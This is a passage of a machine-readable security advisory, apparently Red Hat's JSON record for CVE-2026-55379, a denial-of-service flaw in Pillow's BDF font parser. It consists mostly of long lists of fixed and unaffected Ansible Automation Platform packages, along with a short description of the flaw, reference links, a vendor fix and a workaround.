"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497452"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by providing a specially crafted BDF font file. The library\u0027s image processing function fails to properly validate dimensions from the font file, bypassing a critical security check designed to prevent excessive memory usage. This oversight can lead to the system consuming an unreasonable amount of memory, making it unavailable to legitimate users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via crafted BDF font file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in the Pillow Python imaging library. The BDF font file parser passes attacker-controlled dimensions to Image.new() without decompression bomb validation, allowing excessive memory allocation and denial of service.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-55379"
},
{
"category": "external",
"summary": "RHBZ#2497452",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497452"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-55379",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-55379"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-55379",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55379"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d",
"url": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-45hq-cxwh-f6vc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-45hq-cxwh-f6vc"
}
],
"release_date": "2026-07-06T18:52:11.633000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:10:56+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50319"
},
{
"category": "workaround",
"details": "Do not load BDF font files from untrusted sources. Applications that only process standard image formats (PNG, JPEG, etc.) and do not use BdfFontFile or ImageFont.load() with BDF files are not affected.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
